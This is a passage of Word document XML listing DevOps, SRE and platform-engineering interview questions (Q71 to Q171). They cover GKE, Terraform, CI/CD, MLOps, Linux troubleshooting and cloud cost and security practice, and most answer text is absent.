          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Alert ownership: How would you ensure every alert has an owner, runbook, SLO relationship, and actionable threshold?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. SCC operations: How would you operationalize Security Command Center findings into ticketing, prioritization, remediation, and reporting?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. SLSA/provenance: How would you explain SLSA, provenance, and signed artifacts to a team building a secure delivery platform?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Golden path adoption: Teams avoid your golden path and create their own pipelines. How would you understand why and improve adoption?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q75. Service catalog: How would you design service ownership metadata, dependency mapping, and production readiness status in a service catalog?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q76. Batch inference: How would you design batch inference on GCP using GKE, Cloud Run jobs, Vertex AI, or Composer, and what tradeoffs matter?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q77. LLM app operations: How would you operate an LLM-backed service in production, including latency, cost, prompt changes, safety, and observability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q78. FinOps showback: How would you implement cost allocation, labels, budgets, showback, and team accountability across GCP projects?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q79. Incident behavioral: Tell me about a time you disagreed with developers during a production incident. How did you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q80. Leadership behavioral: How would you mentor junior engineers on Kubernetes troubleshooting and Terraform safety?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q81. Design tradeoff: When would you intentionally choose a simpler architecture over a highly available multi-region design?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q82. Communication: Explain a complex GKE outage to a non-technical product leader in two minutes.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q83. Drift monitoring: In production, how would you detect data drift, concept drift, and schema drift, and how would each one trigger different actions?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q84. Model registry: How would you design model versioning, approval workflow, rollback, lineage, and auditability using MLflow Registry or Vertex AI Model Registry?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q85. Feature store: What production risks does a feature store solve, and how would you design feature freshness, parity, governance, and rollback?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q86. Batch vs real-time inference: How would you choose between batch inference, real-time inference, asynchronous inference, and streaming inference for different business use cases?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q87. A/B and canary for ML: How would you run A/B testing or canary deployment for an ML model while protecting users and measuring business impact?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q88. Model rollback: A newly deployed model has lower latency but worse business outcomes. How would you detect this and roll back safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q89. Reproducible training: How would you make an ML training pipeline reproducible across code version, data version, features, environment, and model artifact?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q90. Metadata management: What metadata would you capture for every ML run to support audit, rollback, debugging, and compliance?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q91. Champion-challenger: How would you implement a champion-challenger model deployment pattern in production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q92. Kubernetes control plane: Explain what happens from kubectl apply to a running pod, including API server, scheduler, kubelet, CNI, and controllers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q93. StatefulSet vs Deployment: When would you use StatefulSet, Deployment, Job, CronJob, or DaemonSet in real Kubernetes platforms?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q94. CNI troubleshooting: Pods on different nodes cannot communicate. How would you debug CNI, routes, firewall rules, network policies, and node health?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q95. Pod affinity: When would you use node selectors, affinity, anti-affinity, topology spread constraints, taints, and tolerations?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q96. Resource quotas: How would you design ResourceQuotas and LimitRanges for a shared cluster without blocking legitimate scaling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q97. Docker image design: How would you build secure, small, reproducible Docker images for production services?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q98. Helm rollback: A Helm upgrade failed and left resources in a partial state. How would you recover and prevent it next time?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q99. DevOps lifecycle: Explain how you would design the full SDLC for a cloud-native service from code commit to production operations.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q100. Branching strategy: What Git branching and release strategy would you recommend for platform modules and application services?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q101. Artifact promotion: How would you promote artifacts across environments without rebuilding and while preserving provenance?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q102. Secrets in CI/CD: How would you prevent secrets leakage in Jenkins, GitHub Actions, GitLab CI, and Cloud Build?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q103. Deployment rollback criteria: What metrics and business signals should automatically stop or roll back a deployment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q104. Infrastructure testing: How would you test Terraform modules, Kubernetes manifests, Helm charts, and policy-as-code before production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q105. Disaster recovery testing: How would you design a DR test that proves backup, restore, DNS failover, application recovery, and stakeholder communication?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q106. Error budget policy: How would you create an error budget policy that balances feature velocity and reliability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q107. Capacity planning math: What inputs would you use to forecast GKE capacity for CPU, memory, network, storage, and regional failover?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q108. Distributed tracing: A request crosses API gateway, Cloud Run, GKE, Pub/Sub, and Cloud SQL. How would you make tracing useful end to end?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q109. Security baseline: What minimum security baseline would you enforce for every new GCP project?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q110. WAF exceptions: A Cloud Armor WAF rule blocks legitimate traffic. How would you investigate, create exceptions, and avoid weakening security?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q111. Vulnerability management: How would you run vulnerability management for containers, VMs, dependencies, and base images?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q112. Network segmentation: How would you segment environments and teams using VPCs, Shared VPC, firewall rules, folders, and projects?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q113. MTU issue: An application has intermittent failures over VPN or interconnect due to packet size. How would you identify and fix MTU problems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q114. REST API automation: How would you design a REST API that allows teams to request infrastructure safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q115. Stakeholder tradeoff: Product wants faster releases, security wants stricter gates, and SRE wants fewer incidents. How would you align them?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q116. Resume deep-dive - GitHub to Bitbucket migration: You led a GitHub-to-Bitbucket migration that improved engineering productivity by 30 percent. How did you plan the migration, handle CI/CD and webhook changes, and minimize disruption?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q117. Resume deep-dive - enterprise CI/CD: You built CI/CD platforms with Jenkins, GitHub Actions, Terraform, Docker, Kubernetes, Helm, and Ansible. How did you standardize pipelines across many application teams with different tech stacks?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q118. Resume deep-dive - multi-cloud IaC: You delivered Terraform and Ansible IaC across GCP, AWS, and Azure. What did you do differently for state management, provider versioning, and secrets across three clouds?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q119. Resume deep-dive - DR with Kasten K10: You engineered backup and disaster recovery using Veeam and Kasten K10 for Kubernetes. How would you test that a Kubernetes-native backup actually restores a stateful workload correctly?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q120. Resume deep-dive - GCP migration: You reduced deployment effort by 40 percent automating CI/CD with Jenkins, Cloud Build, and Terraform, and supported an on-prem to GCP migration. What was the riskiest part of that migration and how did you de-risk it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q121. Current market 2026 - GKE Autopilot vs Standard: For a platform serving 40+ product teams, how would you decide between GKE Autopilot and Standard mode today, and what operational control do you give up with Autopilot?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q122. Current market 2026 - Workload Identity Federation: How would you design keyless authentication from GitHub Actions or another CI system to GCP using Workload Identity Federation instead of long-lived service account keys?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q123. Current market 2026 - Terraform vs OpenTofu: With Terraform's licensing changes and OpenTofu's rise, how would you evaluate whether to stay on Terraform Enterprise or migrate to OpenTofu for a large enterprise estate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q124. Current market 2026 - Gateway API migration: GKE is moving from Ingress to Gateway API. How would you plan a migration from existing Ingress controllers to Gateway API with zero downtime?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q125. Current market 2026 - image signing and provenance: How would you enforce Binary Authorization with Sigstore/cosign-signed images and SLSA provenance before anything deploys to GKE?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q126. Current market 2026 - GKE Dataplane V2: What operational differences would you expect after enabling GKE Dataplane V2 (Cilium-based), especially for network policies and observability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q127. Current market 2026 - Config Sync at scale: How would you use Config Sync or Argo CD to enforce consistent policy and configuration across dozens of GKE clusters and thousands of namespaces?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q128. Current market 2026 - Docker BuildKit: How would you use BuildKit/buildx for multi-arch, cache-efficient, reproducible container builds in a modern CI pipeline?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q129. Current market 2026 - node auto-provisioning: GKE node auto-provisioning versus Standard cluster autoscaler - how would you decide which to use for spiky, mixed CPU/GPU workloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q130. Current market 2026 - FinOps chargeback: Leadership wants a chargeback/showback model for GKE and Terraform-provisioned infra across 15 teams. How would you design cost attribution without slowing teams down?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q131. Current market 2026 - Terraform state at scale: With hundreds of Terraform workspaces, how do you prevent state drift, blast radius, and slow applies as the platform scales past 50 GCP projects?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q132. Platform team structure: How would you structure a platform engineering team, and what ratio of platform engineers to product teams would you target as the org scales?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q133. You-build-it-you-run-it: How would a platform team enable "you build it, you run it" ownership without every team reinventing observability, security, and deployment tooling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q134. Platform cost visibility: How would you give product teams self-service visibility into their own infrastructure cost inside the developer platform, without building a full FinOps tool from scratch?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q135. Golden path versioning: A golden path template changes and existing services are now out of date. How would you roll out the update and measure adoption without breaking running services?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q136. Platform onboarding: What would the first-day experience look like for a new engineer using your internal developer platform to ship their first service to production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q137. Platform team KPIs: What metrics would convince leadership to keep funding a platform engineering team versus letting application teams manage their own infrastructure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q138. Platform API design: How would you version a platform self-service API so existing automation doesn't break when you add new capabilities?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q139. Linux CPU utilization: How would you check CPU utilization on a Linux server, and which commands would you use?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q140. Linux memory usage: What commands would you use to check memory usage on a Linux server?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q141. High CPU troubleshooting: How would you troubleshoot a Linux server with high CPU usage, step by step?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q142. top vs htop: What is the difference between top and htop, and when would you use each?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q143. Linux disk usage: How would you check disk usage on a Linux server, and how would you find what is consuming the space?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q144. Linux processes: What is a process in Linux, and how would you find and kill a specific process safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q145. Load average: What is load average in Linux, and how do you interpret it relative to CPU core count?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q146. System monitoring approach: How do you approach monitoring systems in production, and what tools have you used?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q147. Sudden CPU spike: A server's CPU usage suddenly spikes to 100 percent. Walk me through exactly what you would do.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q148. Slow system troubleshooting: A system is running slowly. What steps would you take to troubleshoot it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q149. First logs to check: When an incident starts, which logs do you check first, and why?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q150. DevOps definition: What is DevOps, and what problem does it solve for software teams?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q151. Automation definition: What is automation in a DevOps context, and why does it matter?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q152. Deployment vs DaemonSet: What is the difference between a Deployment and a DaemonSet in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q153. ServiceAccount basics: What is a Kubernetes ServiceAccount, and how is it different from a regular user account?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q154. Cluster slowness metrics: If a Kubernetes cluster feels slow, what metrics would you check first?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q155. Explain your automation: You mention you have written automation scripts. Walk me through one you are proud of, end to end.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q156. Scenario - Terraform locked state: Terraform apply is stuck because the state lock in GCS was not released after a crashed CI job. How would you safely unlock and verify state integrity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q157. Scenario - GKE OOMKilled pods: Pods in a GKE cluster keep restarting with OOMKilled after a traffic increase. How would you diagnose and fix it without just raising memory limits blindly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q158. Scenario - Docker image bloat in CI: A CI pipeline's Docker build time doubled and the image grew from 300MB to 1.2GB after a dependency change. How would you find the cause and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q159. Scenario - GKE node pool stuck in NotReady: A GKE node pool shows several nodes stuck in NotReady after a Cluster Autoscaler scale-up. How would you triage and recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q160. Scenario - Terraform drift after manual fix: An on-call engineer manually edited a firewall rule in the GCP console during an incident, and now Terraform plan wants to revert it. How do you reconcile safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q161. Scenario - Ingress cert expiry: Users report TLS warnings on a production GKE service after a cert-manager renewal failed silently. How would you find the root cause and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q162. Scenario - GCP quota outage: A batch job fails at 2am because a GCP compute quota was hit in one region. What immediate and long-term steps would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q163. Scenario - noisy neighbor on shared GKE cluster: One team's workload is starving CPU/network from other namespaces on a shared GKE cluster. How would you diagnose and fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q164. PVC with Deployments: Can a Kubernetes Deployment use a PersistentVolumeClaim, and what are the tradeoffs versus using one with a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q165. Deployment vs StatefulSet for databases: If Deployments can also use PVCs, why do teams still prefer StatefulSets for running databases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q166. StatefulSet scale-down order: What is the pod termination order when you scale down a StatefulSet, and why does that ordering matter for stateful workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q167. Container root access: How would you prevent processes inside a container from running as root?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q168. Cross-namespace pod communication: Can Pods in different Kubernetes namespaces communicate by default, and how would you restrict or allow it deliberately?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q169. Multi-stage CI/CD pipeline: Walk me through a multi-stage CI/CD pipeline you have built, stage by stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q170. Jenkins agent restriction: You have 5 Jenkins agents but only want a specific job to run on 2 of them. How would you configure that?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q171. Skip a Jenkins stage: A pipeline has Stage 0 through Stage 3. How would you configure it so Stage 1 can be skipped on demand?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
